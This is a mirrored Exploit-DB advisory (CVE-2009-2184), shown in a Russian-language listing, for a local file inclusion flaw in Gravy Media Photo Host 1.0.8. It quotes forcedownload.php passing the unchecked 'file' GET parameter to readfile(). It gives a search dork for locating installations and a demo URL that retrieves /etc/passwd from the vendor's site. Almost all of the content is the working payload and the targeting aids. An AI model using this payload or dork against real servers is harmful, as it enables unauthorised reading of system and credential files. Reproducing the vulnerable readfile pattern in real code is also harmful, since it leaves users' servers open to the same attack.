- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8996
- Проверка EDB
-
- Пройдено
- Автор
- LO$ER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-2184
- Дата публикации
- 2009-06-22
Код:
==================================================================
=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
==================================================================
Vendor:http://www.gravy-media.com/
Download:register to download
Dork:"Powered by Gravy Media"
Discovered By:Lo$er
====Vulnerable code(forcedownload.php)====
27. $filename = $_GET['file'];
70. readfile("$filename");
====Demo====
http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd
# milw0rm.com [2009-06-22]- Источник
- www.exploit-db.com
